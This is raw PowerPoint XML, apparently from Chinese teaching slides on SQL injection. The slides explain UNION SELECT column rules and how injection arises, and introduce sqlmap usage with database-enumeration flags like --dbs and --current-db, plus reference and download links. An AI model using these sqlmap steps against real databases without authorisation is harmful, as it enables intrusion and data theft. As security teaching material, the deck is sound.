          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的简单使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082260" y="1290236"/>
            <a:ext cx="1557448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>简单使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5D13D7-B07E-49EB-9880-6BF6BCA1D897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814945" y="2585882"/>
            <a:ext cx="4775731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.freebuf.com/sectool/164608.html</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{009284E1-766F-4ECB-9B3F-F626AFBC9882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2008356" y="1952046"/>
            <a:ext cx="1557448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>更多：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBDF86F2-A804-4D12-B398-CCCEE049C7AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2814945" y="2977866"/>
            <a:ext cx="7578571" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>https://pan.baidu.com/s/16d8xfRDJ1qEq2oS09gamRA 提取码：dtb8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="582611952"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的简单使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082260" y="1290236"/>
            <a:ext cx="1557448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>简单使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="表格 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01B14443-18E3-4096-BCBA-EC4F160E5940}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="787517" y="2059951"/>
          <a:ext cx="11062271" cy="3972363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="247618">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2646272131"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="10814653">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3136249944"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="3972363">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:br>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="317CC5"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="317CC5"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="5499DE"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="317CC5"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="5499DE"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="317CC5"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="5499DE"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr>
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="DFEFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>dbs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>列举数据库</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="inherit"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t" latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>current</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="002D7A"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>db</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="006FE0"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF8000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="inherit"/>
                        </a:rPr>
                        <a:t>当前数据库</a:t>
                      </a:r>
